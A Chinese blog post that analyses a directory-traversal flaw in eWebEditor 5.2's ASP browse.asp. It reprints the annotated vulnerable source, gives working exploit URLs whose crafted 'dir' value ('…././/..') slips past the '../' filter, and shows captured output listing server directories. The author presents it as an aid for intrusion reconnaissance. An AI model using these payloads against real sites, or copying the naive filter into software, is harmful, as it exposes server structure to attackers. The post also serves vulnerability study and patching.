ewebeditor 5.2 列目录漏洞

作者:st0p
由于自己做站用的编辑器是以前自己精简的ewebeditor 5.2 asp版本,干活累了,想休息一下,就分析了一个这个编辑器,没想到,还真让我发现了一个小漏洞,虽然作用不大,不过用来辅助还是蛮不错的.
出现漏洞的文件存在于ewebeditor/asp/browse.asp

ASP/Visual Basic代码
Function GetList()
    Dim s_List, s_Url
    s_List = ""
    Dim oFSO, oUploadFolder, oUploadFiles, oUploadFile, sFileName
    'Response.Write sCurrDir
    'On Error Resume Next
    Set oFSO = Server.CreateObject("Scripting.FileSystemObject")
    Set oUploadFolder = oFSO.GetFolder(Server.MapPath(sCurrDir))
    '注意一下sCurrDir变量,这个值等下我们可以用到
    If Err.Number>0 Then
        s_List = ""
        Exit Function
    End If

    If sDir <> "" Then
        If InstrRev(sDir, "/") > 1 Then
            s_Url= Left(sDir, InstrRev(sDir, "/") - 1)
        Else
            s_Url = ""
        End If

        s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _
            "<td><img border=0 src='../sysimage/file/parentfolder.gif'></td>" & _
            "<td>..</td>" & _
            "<td> </td>" & _
            "</tr>"
    End If
    'Response.Write sDir&"!"&s_List

    Dim oSubFolder
    For Each oSubFolder In oUploadFolder.SubFolders
        'Response.Write oUploadFolder.SubFolders
        If sDir = "" Then
            s_Url = oSubFolder.Name
        Else
            s_Url = sDir & "/" & oSubFolder.Name
        End If
        s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='" & s_Url & "'>" & _
            "<td><img border=0 src='../sysimage/file/closedfolder.gif'></td>" & _
            "<td noWrap>" & oSubFolder.Name & "</td>" & _
            "<td> </td>" & _
            "</tr>"
    Next
    'Response.Write s_List

    Set oUploadFiles = oUploadFolder.Files

    For Each oUploadFile In oUploadFiles
        'Response.Write oUploadFile.Name
        sFileName = oUploadFile.Name
        If CheckValidExt(sFileName) = True Then
        '这行让人有点郁闷,检测了所有允许的文件后缀,如不允许就无法列出,不然就不只列出目录名和图片文件了
            If sDir = "" Then
                s_Url = sContentPath & sFileName
            Else
                s_Url = sContentPath & sDir & "/" & sFileName
            End If

            s_List = s_List & "<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' url='" & s_Url & "'>" & _
                    "<td>" & FileName2Pic(sFileName) & "</td>" & _
                    "<td noWrap>" & sFileName & "</td>" & _
                    "<td align=right>" & GetSizeUnit(oUploadFile.size) & "</td>" & _
                    "</tr>"
        End If
    Next
    Set oUploadFolder = Nothing
    Set oUploadFiles = Nothing
    'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url

    If sDir = "" Then
        s_Url = ""
        's_Url = "/"
    Else
        s_Url = "/" & sDir & ""
        's_Url = "/" & sDir & "/"
    End If

    s_List = s_List & "</table>"
    s_List = HTML2JS(s_List)
    'Response.Write Server.HTMLEncode(s_List)&"!"&s_Url
    s_List = "parent.setDirList(""" & s_List & """, """ & s_Url & """)"
    GetList = s_List
End Function
'如果没有下面这步检测的话,应该就可以列出目录中所有的文件了,有点郁闷..现在只能列出允许后缀的文件和目录名
Function CheckValidExt(s_FileName)
    If sAllowExt = "" Then
        CheckValidExt = True
        Exit Function
    End If

    Dim i, aExt, sExt
    sExt = LCase(Mid(s_FileName, InStrRev(s_FileName, ".") + 1))
    CheckValidExt = False
    aExt = Split(LCase(sAllowExt), "|")
    For i = 0 To UBound(aExt)
        If aExt(i) = sExt Then
            CheckValidExt = True
            Exit Function
        End If
    Next
End Function
'我们顺着代码往下找,发现sCurrDir的值是通过下面的值得到的
Sub InitParam()
    sType = UCase(Trim(Request.QueryString("type")))
    sStyleName = Trim(Request.QueryString("style"))

    Dim i, aStyleConfig, bValidStyle
    bValidStyle = False
    For i = 1 To Ubound(aStyle)
        aStyleConfig = Split(aStyle(i), "|||")
        If Lcase(sStyleName) = Lcase(aStyleConfig(0)) Then
            bValidStyle = True
            Exit For
        End If
    Next

    If bValidStyle = False Then
        OutScript("alert('Invalid Style.')")
    End If

    sBaseUrl = aStyleConfig(19)
    'nAllowBrowse = CLng(aStyleConfig(43))
    nAllowBrowse = 1

    If nAllowBrowse <> 1 Then
        OutScript("alert('Do not allow browse!')")
    End If

    sUploadDir = aStyleConfig(3)
    If Left(sUploadDir, 1) <> "/" Then
        Select Case sType
        Case "REMOTE"
            sUploadDir = "../../" & sUploadDir & "Image/"
        Case "FILE"
            sUploadDir = "../../" & sUploadDir & "Other/"
        Case "MEDIA"
            sUploadDir = "../../" & sUploadDir & "Media/"
        Case "FLASH"
            sUploadDir = "../../" & sUploadDir & "Flash/"
        Case Else
            sUploadDir = "../../" & sUploadDir & "Image/"
        End Select
    End If
    'sUploadDir =sUploadDir &"/"

    Select Case sBaseUrl
    Case "0"
        'sContentPath = aStyleConfig(23)
        Select Case sType
        Case "REMOTE"
            sContentPath = "../" & aStyleConfig(3) & "Image/"
        Case "FILE"
            sContentPath = "../" & aStyleConfig(3) & "Other/"
        Case "MEDIA"
            sContentPath = "../" & aStyleConfig(3) & "Media/"
        Case "FLASH"
            sContentPath = "../" & aStyleConfig(3) & "Flash/"
        Case Else
            sContentPath = "../" & aStyleConfig(3) & "Image/"
        End Select
    Case "1"
        sContentPath = RelativePath2RootPath(sUploadDir)
    Case "2"
        sContentPath = RootPath2DomainPath(RelativePath2RootPath(sUploadDir))
    End Select

    Select Case sType
    Case "REMOTE"
        sAllowExt = aStyleConfig(10)
    Case "FILE"
        sAllowExt = aStyleConfig(6)
    Case "MEDIA"
        sAllowExt = aStyleConfig(9)
    Case "FLASH"
        sAllowExt = aStyleConfig(7)
    Case Else
        sAllowExt = aStyleConfig(8)
    End Select

    sCurrDir = sUploadDir '注意这里,这个是得到了配置的路径地址
    sDir = Trim(Request("dir")) '得到dir变量
    sDir = Replace(sDir, "\", "/") '对dir变量进行过滤
    sDir = Replace(sDir, "../", "")
    sDir = Replace(sDir, "./", "")
    If sDir <> "" Then
        If CheckValidDir(Server.Mappath(sUploadDir & sDir)) = True Then
            sCurrDir = sUploadDir & sDir & "/"
            '重点就在这里了,看到没有,当sUploadDir & sDir存在的时候,sCurrDir就为sUploadDir & sDir的值了
                        '虽然上面对sDir进行了过滤,不过我们完全可以跳过.具体利用st0p会在下面的利用中给出
        Else
            sDir = ""
        End If
    End If

End Sub

嘿嘿,看到这你应该明白了,其实就是对dir过滤的问题,我们完全可以构造特殊的值来跳过验证,这样就可以得到目录结构和显示设置文件中允许的文件后缀的文件了..
利用方法如下
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/..
由于st0p测试的时候,上传目录是根目录下的uploadfile,通过上面的地址就可以得到根目录下的所有目录了.
嘿嘿,如果你发现打开的时候显示的是空白,不要灰心,这就对了,直接查看源代码,看到了吗,里面就有你根目录的目录名字了.
嘿嘿,他根目录下有个guest目录,我们通过下面的地址可以列出他下面的结构
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/…././/guest
然后我们也可以通过
http://www.st0p.org/ewebeditor/asp/browse.asp?style=standard650&dir=…././/../…././/..
可以往更上层跳,我测试的那个虚拟主机,得到的是www,logfile,datebase这三个目录.

<HTML><HEAD><meta http-equiv='Content-Type' content='text/html; charset=utf-8'><TITLE>eWebEditor</TITLE></head><body><script language=javascript>parent.setDirList("<tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../..'><td><img border=0 src='../sysimage/file/parentfolder.gif'></td><td>..</td><td> </td></tr><tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../../../logfiles'><td><img border=0 src='../sysimage/file/closedfolder.gif'></td><td noWrap>logfiles</td><td> </td></tr><tr onclick='doRowClick(this)' onmouseover='doRowOver(this)' onmouseout='doRowOut(this)' isdir='true' path='../../../www'><td><img border=0 src='../sysimage/file/closedfolder.gif'></td><td noWrap>www</td><td> </td></tr></table>", "/../../..")</script></body></html>

这个漏洞只能算是在入侵检测的时候辅助使用,可以得到目录结构,比如说更改了管理目录了,数据库目录了,这样就可以得到目录名字了,不过没法列出文件就让st0p郁闷了,唉….
这是st0p在blog上发的第二篇原创文件,以后会多发一些的,嘎,现在也算blog开张了..
注意：网址中跳目录用到的全是.我发现前台会被替换掉